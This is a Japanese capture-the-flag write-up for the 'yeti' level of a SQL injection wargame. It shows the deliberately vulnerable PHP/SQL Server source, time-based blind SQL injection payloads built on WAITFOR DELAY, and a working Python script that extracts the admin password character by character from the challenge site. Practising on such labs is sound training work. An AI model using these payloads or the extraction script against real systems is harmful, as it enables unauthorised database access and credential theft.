<?php include "./config.php"; login_chk(); $db = mssql_connect("yeti"); if(preg_match('/master|sys|information|;/i', $_GET['id'])) exit("No Hack ~_~"); if(preg_match('/master|sys|information|;/i', $_GET['pw'])) exit("No Hack ~_~"); $query = "select id from prob_yeti where id='{$_GET['id']}' and pw='{$_GET['pw']}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; sqlsrv_query($db,$query); $query = "select pw from prob_yeti where id='admin'"; $result = sqlsrv_fetch_array(sqlsrv_query($db,$query)); if($result['pw'] === $_GET['pw']) solve("yeti"); highlight_file(__FILE__);
特徴は以下。
- SQL Server
- id,pwが入力可能
master,sys,information,;がフィルタリング
- adminのpwを取ってくる必要がある
なにもできないように見えるが、Time-based Blind SQL Injectionかな…
Time-based Blind SQL Injection
長さを以下で取得。
' if ({md} <= (select len(pw) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --
内容を以下で取得。
' if ({md} <= (select ascii(substring(pw,{i+1},1)) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --
import requests
import time
url = "https://los.rubiya.kr/chall/yeti_e65.php"
cookie = {'PHPSESSID': 'eoq5'}
interval = 1
ok = 0
ng = 60
while ok + 1 != ng:
md = (ok + ng) // 2
q = f"' if ({md} <= (select len(pw) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --"
start = time.time()
res = requests.get(url, params={'id': q}, cookies=cookie)
print(f"[+] try {md}")
if (time.time() - start) > interval:
ok = md
else:
ng = md
length = ok
print(f"[*] length = {length}")
ans = ""
for i in range(0, length):
ok = 0
ng = 256
while ok + 1 != ng:
md = (ok + ng) // 2
q = f"' if ({md} <= (select ascii(substring(pw,{i+1},1)) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --"
start = time.time()
res = requests.get(url, params={'id': q}, cookies=cookie)
print(f"[+] try {md}")
if (time.time() - start) > interval:
ok = md
else:
ng = md
ans += str(chr(ok))
print(f"[*] {ans}")
print(f"[*] find! {ans}")
